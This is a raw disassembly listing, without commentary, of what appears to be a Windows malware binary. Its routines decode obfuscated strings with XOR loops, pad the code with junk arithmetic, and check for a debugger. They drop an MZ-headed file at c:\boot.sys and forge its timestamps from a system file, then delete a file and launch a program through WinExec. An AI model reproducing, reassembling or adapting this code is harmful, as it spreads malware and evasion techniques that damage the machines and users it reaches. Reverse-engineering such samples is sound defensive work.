loc_407EC8: ; CODE XREF: sub_406E3F+3EE�j
; sub_406E3F+E6B�j
cmp [ebp+var_525E4], 0
jz short loc_407EDD
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EDD: ; CODE XREF: sub_406E3F+1090�j
mov [ebp+var_52626], 5586h
inc [ebp+var_52626]
cmp [ebp+var_5260C], 0
jz short loc_407F02
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F02: ; CODE XREF: sub_406E3F+10B5�j
cmp [ebp+var_52604], 0
jz short loc_407F17
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F17: ; CODE XREF: sub_406E3F+10CA�j
mov [ebp+var_5262C], 383Eh
add [ebp+var_5262C], 5085h
loc_407F2B: ; CODE XREF: sub_406E3F+25D�j
cmp [ebp+var_52600], 0
jz short loc_407F40
mov eax, [ebp+var_52600]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F40: ; CODE XREF: sub_406E3F+10F3�j
lea edi, [ebp+var_52684]
lea esi, aGG ; "<ƒ^>ƒ"
mov ecx, 3
rep movsw
loc_407F54: ; CODE XREF: sub_406E3F+15E�j
; sub_406E3F+1B8�j ...
cmp [ebp+var_525F8], 0
jz short loc_407F69
mov eax, [ebp+var_525F8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F69: ; CODE XREF: sub_406E3F+111C�j
call sub_40C1F4 ; GetProcessHeap
loc_407F6E: ; CODE XREF: sub_406E3F+135�j
cmp [ebp+var_525F4], 0
jz loc_406E93
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_406E93
; ---------------------------------------------------------------------------
loc_407F8C: ; CODE XREF: sub_406E3F+49�j
pop edi
pop esi
pop ebx
leave
retn
sub_406E3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F91 proc near ; DATA XREF: sub_408043+23�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset word_441422
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call sub_40C194 ; GetCurrentThreadId
mov [ebp+var_4], 0
mov [ebp+var_1C], 57D7h
mov edi, [ebp+var_1C]
mov esi, edi
add esi, edi
mov [ebp+var_1C], esi
loc_407FD4: ; CODE XREF: sub_407F91+77�j
; sub_407F91+97�j
call sub_40C1B8 ; RtlGetLastWin32Error
mov edi, dword_441370
add edi, 1F0h
push edi
call sub_40C638
add esp, 4
call sub_40C194 ; GetCurrentThreadId
call sub_406E3F
mov edi, off_44141E
mov [ebp+var_20], edi
cmp dword_44137C, 0
jnz short loc_407FD4
jmp short loc_408031
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_408031
; ---------------------------------------------------------------------------
mov [ebp+var_1C], 1
mov eax, [ebp+var_1C]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_40C1B8 ; RtlGetLastWin32Error
jmp short loc_407FD4
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_408031: ; CODE XREF: sub_407F91+79�j
; sub_407F91+82�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407F91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408043 proc near ; CODE XREF: sub_40A4E2+750�p
var_5 = byte ptr -5
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, [ebp+arg_0]
mov ds:dword_40F1E4, eax
call sub_40C194 ; GetCurrentThreadId
push offset dword_44137C
push 0
push 0
push offset sub_407F91
push 0
push 0
call sub_40C3D4 ; CreateThread
mov ebx, eax
mov ax, word_44142E
mov [ebp+var_2], ax
push ebx
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_5]
lea esi, byte_441430
mov ecx, 3
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_408043 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
lea edi, [ebp-5]
lea esi, byte_441433
xor ecx, ecx
inc ecx
rep movsb
cmp dword_44133C, 0
jnz short loc_4080BD
xor eax, eax
jmp short loc_40811B
; ---------------------------------------------------------------------------
loc_4080BD: ; CODE XREF: .text:004080B7�j
mov word ptr [ebp-4], 7A76h
movzx eax, word ptr [ebp-4]
imul eax, 6BA8h
mov [ebp-4], ax
mov eax, ds:dword_42EBE4
cmp [ebp+8], eax
jz short loc_4080DF
xor eax, eax
jmp short loc_40811B
; ---------------------------------------------------------------------------
loc_4080DF: ; CODE XREF: .text:004080D9�j
lea ecx, byte_41EBE0
or eax, 0FFFFFFFFh
loc_4080E8: ; CODE XREF: .text:004080ED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4080E8
mov edi, eax
add edi, 1
push edi
push offset byte_41EBE0
push dword ptr [ebp+0Ch]
call sub_40C674
add esp, 0Ch
mov byte ptr [ebp-1], 0F7h
movzx eax, byte ptr [ebp-1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-1], al
mov eax, 1
loc_40811B: ; CODE XREF: .text:004080BB�j
; .text:004080DD�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40811F proc near ; CODE XREF: sub_4081B0+213�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 23Ah
push esi
push [ebp+arg_0]
mov eax, dword_44143C
lea eax, ds:4141B0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov [ebp+var_8], 1E4h
xor edi, edi
jmp short loc_40816C
; ---------------------------------------------------------------------------
loc_408155: ; CODE XREF: sub_40811F+4F�j
mov eax, dword_44143C
add eax, edi
lea eax, ds:4141B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 32h
mov [eax], dl
inc edi
loc_40816C: ; CODE XREF: sub_40811F+34�j
cmp edi, esi
jl short loc_408155
mov eax, dword_44143C
add eax, esi
mov byte ptr ds:dword_4141B0[eax], 0
xor edi, edi
mov edi, dword_44143C
mov eax, edi
inc eax
add eax, esi
mov dword_44143C, eax
cmp eax, 0DF0h
jle short loc_40819F
and dword_44143C, 0
loc_40819F: ; CODE XREF: sub_40811F+77�j
mov [ebp+var_C], 7Dh
lea eax, dword_4141B0[edi]
pop edi
pop esi
leave
retn
sub_40811F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081B0 proc near ; DATA XREF: sub_40A4E2+74B�o
var_29 = byte ptr -29h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
call sub_40C188 ; GetCurrentProcessId
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_10], 0
loc_4081CA: ; CODE XREF: sub_4081B0+17F�j
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ah
jnz loc_4082E7
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [eax+edx+11h], 20h
jz short loc_4081F2
cmp byte ptr [eax+edx+14h], 20h
jnz loc_4082E7
loc_4081F2: ; CODE XREF: sub_4081B0+35�j
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, [ebp+var_4]
inc eax
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 34h
jz short loc_40820D
cmp al, 35h
jnz loc_4082E7
loc_40820D: ; CODE XREF: sub_4081B0+53�j
mov eax, [ebp+var_4]
add eax, 11h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 20h
jnz short loc_408225
mov [ebp+var_8], 10h
jmp short loc_40822C
; ---------------------------------------------------------------------------
loc_408225: ; CODE XREF: sub_4081B0+6A�j
mov [ebp+var_8], 13h
loc_40822C: ; CODE XREF: sub_4081B0+73�j
mov [ebp+var_9], 0
xor ebx, ebx
jmp loc_4082BA
; ---------------------------------------------------------------------------
loc_408237: ; CODE XREF: sub_4081B0+10D�j
mov [ebp+var_11], 82h
add [ebp+var_11], 25h
cmp [ebp+var_8], 13h
jnz short loc_40827B
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_40827B
mov edi, 5
mov esi, ebx
inc esi
mov [ebp+var_18], edi
mov eax, esi
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_1C], eax
mov eax, edi
mov edi, [ebp+var_1C]
mul [ebp+var_1C]
mov [ebp+var_20], eax
mov edi, eax
cmp edi, esi
jz short loc_4082B9
loc_40827B: ; CODE XREF: sub_4081B0+93�j
; sub_4081B0+A2�j
call sub_40C2B4 ; IsDebuggerPresent
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408294
cmp al, 39h
jle short loc_408296
loc_408294: ; CODE XREF: sub_4081B0+DE�j
jmp short loc_4082E7
; ---------------------------------------------------------------------------
loc_408296: ; CODE XREF: sub_4081B0+E2�j
mov [ebp+var_12], 0F1h
add [ebp+var_12], 1
movzx eax, [ebp+var_9]
mov edx, [ebp+var_4]
inc edx
add edx, ebx
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_432F80[eax], dl
add [ebp+var_9], 1
loc_4082B9: ; CODE XREF: sub_4081B0+C9�j
inc ebx
loc_4082BA: ; CODE XREF: sub_4081B0+82�j
cmp ebx, [ebp+var_8]
jb loc_408237
mov eax, [ebp+var_8]
mov ds:byte_432F80[eax], 0
call sub_40133E
or eax, eax
jz short loc_4082DE
call sub_40C1F4 ; GetProcessHeap
jmp short loc_4082E7
; ---------------------------------------------------------------------------
loc_4082DE: ; CODE XREF: sub_4081B0+125�j
mov [ebp+var_10], 1
jmp short loc_408338
; ---------------------------------------------------------------------------
loc_4082E7: ; CODE XREF: sub_4081B0+24�j
; sub_4081B0+3C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0
jz short loc_408334
call sub_40C194 ; GetCurrentThreadId
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ch
jnz short loc_40832A
cmp byte ptr [eax+edx+1], 46h
jnz short loc_40832A
cmp byte ptr [eax+edx+2], 4Fh
jnz short loc_40832A
cmp byte ptr [eax+edx+3], 52h
jnz short loc_40832A
cmp byte ptr [eax+edx+4], 4Dh
jnz short loc_40832A
cmp byte ptr [eax+edx+5], 5Fh
jz short loc_408334
loc_40832A: ; CODE XREF: sub_4081B0+155�j
; sub_4081B0+15C�j ...
call sub_40C1F4 ; GetProcessHeap
jmp loc_4081CA
; ---------------------------------------------------------------------------
loc_408334: ; CODE XREF: sub_4081B0+144�j
; sub_4081B0+178�j
and [ebp+var_10], 0
loc_408338: ; CODE XREF: sub_4081B0+135�j
cmp [ebp+var_10], 0
jz short loc_40834D
mov eax, ds:dword_42EBE4
mov dword_43B214, eax
jmp loc_4083FE
; ---------------------------------------------------------------------------
loc_40834D: ; CODE XREF: sub_4081B0+18C�j
lea edi, [ebp+var_1C+3]
lea esi, byte_441440
mov ecx, 3
rep movsb
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40DFD0
call sub_40C2FC ; CreateFileA
mov [ebp-14h], eax
push 2
push 0
push 0
push eax
call sub_40C32C ; SetFilePointer
mov eax, dword_441443
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408395: ; CODE XREF: sub_4081B0+1EA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408395
mov edi, eax
push 0
lea esi, [ebp+var_20]
push esi
push edi
push [ebp+arg_0]
push dword ptr [ebp-14h]
call sub_40C3B0 ; WriteFile
mov word ptr [ebp+var_18+2], 5BC2h
sub word ptr [ebp+var_18+2], 450h
push 2
push offset a?8 ; "?8"
call sub_40811F
add esp, 8
push 0
lea edi, [ebp+var_20]
push edi
mov edi, 0Eh
sub edi, dword_441438
push edi
push eax
push dword ptr [ebp-14h]
call sub_40C3B0 ; WriteFile
push dword ptr [ebp-14h]
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_29]
lea esi, aIz ; "<iZ!"
mov ecx, 5
rep movsb
loc_4083FE: ; CODE XREF: sub_4081B0+198�j
pop edi
pop esi
pop ebx
leave
retn
sub_4081B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408403 proc near ; CODE XREF: sub_40849F+8B�p
; sub_4085C0+D5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 2C3h
push esi
push [ebp+arg_0]
mov eax, dword_445458
lea eax, ds:40D000h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_408449
; ---------------------------------------------------------------------------
loc_408432: ; CODE XREF: sub_408403+48�j
mov eax, dword_445458
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 47h
mov [eax], dl
inc edi
loc_408449: ; CODE XREF: sub_408403+2D�j
cmp edi, esi
jl short loc_408432
mov [ebp+var_8], 32Bh
mov eax, dword_445458
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
mov edi, dword_445458
mov eax, edi
lea eax, [eax+esi+5]
mov dword_445458, eax
add dword_445458, 3
cmp dword_445458, 0E02h
jle short loc_40848E
and dword_445458, 0
loc_40848E: ; CODE XREF: sub_408403+82�j
mov [ebp+var_C], 249h
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_408403 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40849F proc near ; CODE XREF: sub_4085C0+94�p
var_234 = word ptr -234h
var_232 = byte ptr -232h
var_231 = byte ptr -231h
var_229 = byte ptr -229h
var_221 = byte ptr -221h
var_219 = byte ptr -219h
var_211 = byte ptr -211h
var_20C = byte ptr -20Ch
var_107 = byte ptr -107h
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 234h
push ebx
push esi
push edi
lea edi, [ebp+var_211]
lea esi, aFj_ ; "fj:."
mov ecx, 5
rep movsb
lea edi, [ebp+var_219]
lea esi, aSHqZt ; "s+HQ-ZT"
movsd
movsd
mov [ebp+var_1], 71h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push 104h
lea eax, [ebp+var_20C]
push eax
call sub_40C200 ; GetSystemDirectoryA
lea edi, [ebp+var_232]
lea esi, byte_445469
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_107]
push eax
call sub_40C138
mov [ebp+var_2], 20h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], al
push 0Dh
push offset a5Tui ; "\x1B,\"5)\"+tui#++"
call sub_408403
push eax
lea edi, [ebp+var_107]
push edi
call sub_40C6D4
add esp, 10h
call sub_40C218 ; GetTickCount
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_107]
push eax
call sub_40C2FC ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4085BB
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_231]
push eax
lea eax, [ebp+var_229]
push eax
lea eax, [ebp+var_221]
push eax
push ebx
call sub_40C1AC ; GetFileTime
mov ax, word_44546A
mov [ebp+var_234], ax
lea eax, [ebp+var_231]
push eax
lea eax, [ebp+var_229]
push eax
lea eax, [ebp+var_221]
push eax
push [ebp+arg_0]
call sub_40C338 ; SetFileTime
call sub_40C218 ; GetTickCount
push ebx
call sub_40C1DC ; CloseHandle
loc_4085BB: ; CODE XREF: sub_40849F+C5�j
pop edi
pop esi
pop ebx
leave
retn
sub_40849F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085C0 proc near ; CODE XREF: sub_40A4E2+99�p
var_230 = dword ptr -230h
var_22A = byte ptr -22Ah
var_224 = byte ptr -224h
var_220 = byte ptr -220h
var_219 = dword ptr -219h
var_215 = byte ptr -215h
var_111 = byte ptr -111h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov eax, dword_44546C
mov [ebp+var_219], eax
call sub_40C224 ; GetVersion
cmp eax, 80000000h
jnb loc_408712
mov ebx, 1361h
sub ebx, 4C21h
lea edi, [ebp+var_111]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
lea edi, [ebp+var_220]
lea esi, aCjA ; "%CJ a/"
mov ecx, 7
rep movsb
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_111]
push eax
call sub_40C2FC ; CreateFileA
mov ebx, eax
call sub_40C1B8 ; RtlGetLastWin32Error
push 0
lea eax, [ebp+var_224]
push eax
push 4001h
push offset aMzr ; "MZ"
push ebx
call sub_40C3B0 ; WriteFile
push ebx
call sub_40849F
call sub_40C1F4 ; GetProcessHeap
push ebx
call sub_40C1DC ; CloseHandle
lea edi, [ebp+var_22A]
lea esi, aZ ; " < z"
mov ecx, 3
rep movsw
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C200 ; GetSystemDirectoryA
call sub_40C2B4 ; IsDebuggerPresent
push 0Ah
push offset aB4I7_ ; "b4\x1B$*#i7.!"
call sub_408403
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_215]
push edi
call sub_40C6B0
mov ebx, 4F6Ah
mov eax, 39EEh
mul ebx
mov [ebp+var_230], eax
mov ebx, eax
push 1Dh
push offset byte_445DD1
call sub_408403
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C6D4
add esp, 28h
lea eax, [ebp+var_215]
push eax
call sub_40C3E0 ; DeleteFileA
mov [ebp+var_105], 2Ah
movzx eax, [ebp+var_105]
imul eax, 4B11h
mov [ebp+var_105], al
push 0
lea eax, [ebp+var_104]
push eax
call sub_40C3A4 ; WinExec
loc_408712: ; CODE XREF: sub_4085C0+21�j
pop edi
pop esi
pop ebx
leave
retn
sub_4085C0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_445514
lea eax, ds:431EA0h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_408753
; ---------------------------------------------------------------------------
loc_40873C: ; CODE XREF: .text:00408755�j
mov eax, dword_445514
add eax, edi
lea eax, ds:431EA0h[eax]
movsx edx, byte ptr [eax]
xor edx, 8
mov [eax], dl
inc edi
loc_408753: ; CODE XREF: .text:0040873A�j
cmp edi, esi
jl short loc_40873C
mov eax, dword_445514
add eax, esi
mov byte ptr ds:dword_431EA0[eax], 0
xor edi, edi
mov edi, dword_445514
mov eax, edi
add eax, 6
add eax, esi
mov dword_445514, eax
inc dword_445514
cmp dword_445514, 0DEBh
jle short loc_408793
and dword_445514, 0
loc_408793: ; CODE XREF: .text:0040878A�j
lea eax, dword_431EA0[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40879D proc near ; CODE XREF: sub_4088C3+35�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C2B4 ; IsDebuggerPresent
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40C368 ; VirtualAlloc
jmp short loc_4087BD
; ---------------------------------------------------------------------------
call sub_40C188 ; GetCurrentProcessId
loc_4087BD: ; CODE XREF: sub_40879D+19�j
pop ebp
retn
sub_40879D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087BF proc near ; CODE XREF: sub_4088C3+CD�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
lea edi, [ebp+var_1]
lea esi, dword_445518
xor ecx, ecx
inc ecx
rep movsb
push 8000h
push 0
push [ebp+arg_0]
call sub_40C374 ; VirtualFree
pop edi
pop esi
leave
retn
sub_4087BF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 204h
push esi
push dword ptr [ebp+8]
mov eax, dword_445524
lea eax, ds:439390h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 132h
xor edi, edi
jmp short loc_408836
; ---------------------------------------------------------------------------
loc_40881C: ; CODE XREF: .text:00408838�j
mov eax, dword_445524
add eax, edi
lea eax, ds:439390h[eax]
movsx edx, byte ptr [eax]
xor edx, 0EEh
mov [eax], dl
inc edi
loc_408836: ; CODE XREF: .text:0040881A�j
cmp edi, esi
jl short loc_40881C
mov dword ptr [ebp-0Ch], 12h
mov eax, dword_445524
add eax, esi
mov byte ptr ds:dword_439390[eax], 0
mov edi, dword_445524
mov eax, edi
add eax, 4
add eax, esi
mov dword_445524, eax
add dword_445524, 3
cmp dword_445524, 0DFFh
jle short loc_40887C
and dword_445524, 0
loc_40887C: ; CODE XREF: .text:00408873�j
lea eax, dword_439390[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408886 proc near ; CODE XREF: sub_4088C3+DE�p
var_5 = byte ptr -5
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, 681Dh
add ebx, 0F5Fh
push offset dword_4454CC
push offset dword_44548C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40B6E0
lea edi, [ebp+var_5]
lea esi, aV2 ; "V& 2"
mov ecx, 5
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_408886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088C3 proc near ; CODE XREF: sub_4096E4+459�p
var_6B = byte ptr -6Bh
var_64 = byte ptr -64h
var_5C = byte ptr -5Ch
var_1C = word ptr -1Ch
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C188 ; GetCurrentProcessId
call sub_40C188 ; GetCurrentProcessId
lea edi, [ebp+var_64]
lea esi, aS91rndu ; "s91RNDU"
movsd
movsd
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4088EF
add eax, 3Fh
loc_4088EF: ; CODE XREF: sub_4088C3+27�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_40879D
pop ecx
mov [ebp+var_18], eax
lea edi, [ebp+var_6B]
lea esi, aKsh4 ; " KSh/4"
mov ecx, 7
rep movsb
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_40891C
add eax, 3Fh
loc_40891C: ; CODE XREF: sub_4088C3+54�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40C320 ; RtlZeroMemory
call sub_40C1F4 ; GetProcessHeap
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40C674
add esp, 0Ch
mov [ebp+var_19], 8Ch
add [ebp+var_19], 72h
lea eax, [ebp+var_14]
push eax
call sub_40B81E
mov [ebp+var_1C], 5812h
inc [ebp+var_1C]
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_40897A
; ---------------------------------------------------------------------------
loc_408965: ; CODE XREF: sub_4088C3+C8�j
call sub_40C1F4 ; GetProcessHeap
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40B845
add ebx, 40h
inc [ebp+var_4]
loc_40897A: ; CODE XREF: sub_4088C3+A0�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408985
add eax, 3Fh
loc_408985: ; CODE XREF: sub_4088C3+BD�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_408965
push [ebp+var_18]
call sub_4087BF
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_8]
call sub_408886
call sub_40C194 ; GetCurrentThreadId
mov eax, dword_44551C
add eax, 0Eh
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_40C668
add esp, 18h
or eax, eax
jz short loc_4089CD
xor eax, eax
inc eax
jmp short loc_4089CF
; ---------------------------------------------------------------------------
loc_4089CD: ; CODE XREF: sub_4088C3+103�j
xor eax, eax
loc_4089CF: ; CODE XREF: sub_4088C3+108�j
pop edi
pop esi
pop ebx
leave
retn
sub_4088C3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_445544
lea eax, ds:438380h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-4], 11Eh
xor edi, edi
jmp short loc_408A18
; ---------------------------------------------------------------------------
loc_408A01: ; CODE XREF: .text:00408A1A�j
mov eax, dword_445544
add eax, edi
lea eax, ds:438380h[eax]
movsx edx, byte ptr [eax]
xor edx, 66h
mov [eax], dl
inc edi
loc_408A18: ; CODE XREF: .text:004089FF�j
cmp edi, esi
jl short loc_408A01
mov eax, dword_445544
add eax, esi
mov byte ptr ds:dword_438380[eax], 0
mov edi, dword_445544
mov eax, edi
add eax, 4
add eax, esi
mov dword_445544, eax
add dword_445544, 3
cmp dword_445544, 0DEFh
jle short loc_408A57
and dword_445544, 0
loc_408A57: ; CODE XREF: .text:00408A4E�j
lea eax, dword_438380[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A61 proc near ; CODE XREF: sub_4096E4+3C7�p
; sub_4096E4+3DF�p
var_37 = byte ptr -37h
var_31 = byte ptr -31h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_26 = word ptr -26h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_1F = byte ptr -1Fh
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov [ebp+var_16], 2123h
inc [ebp+var_16]
lea edi, [ebp+var_1F]
lea esi, aVyfuC_0 ; "+vyfu C"
movsd
movsd
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408BA8
; ---------------------------------------------------------------------------
loc_408AA1: ; CODE XREF: sub_408A61+152�j
mov [ebp+var_23], 33h
add [ebp+var_23], 1
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_445550[edi]
mov [ebp+var_4], edi
mov [ebp+var_22], 661Eh
movzx eax, [ebp+var_22]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_22], ax
cmp edi, 0FFFFFFFFh
jz loc_408BA7
mov [ebp+var_26], 8F2h
add [ebp+var_26], 3614h
mov eax, [ebp+var_10]
or eax, eax
jl loc_408BA1
cmp eax, 3
jg loc_408BA1
jmp off_445958[eax*4]
; ---------------------------------------------------------------------------
mov [ebp+var_31], 0C0h
add [ebp+var_31], 6Dh
loc_408B05: ; CODE XREF: sub_408A61+95�j
; DATA XREF: .data:off_445958�o
inc [ebp+var_10]
jmp loc_408BA1
; ---------------------------------------------------------------------------
loc_408B0D: ; CODE XREF: sub_408A61+95�j
; DATA XREF: .data:0044595C�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BA1
; ---------------------------------------------------------------------------
loc_408B33: ; CODE XREF: sub_408A61+95�j
; DATA XREF: .data:00445960�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
lea edi, [ebp+var_37]
lea esi, a7cx_0 ; "#7CX|"
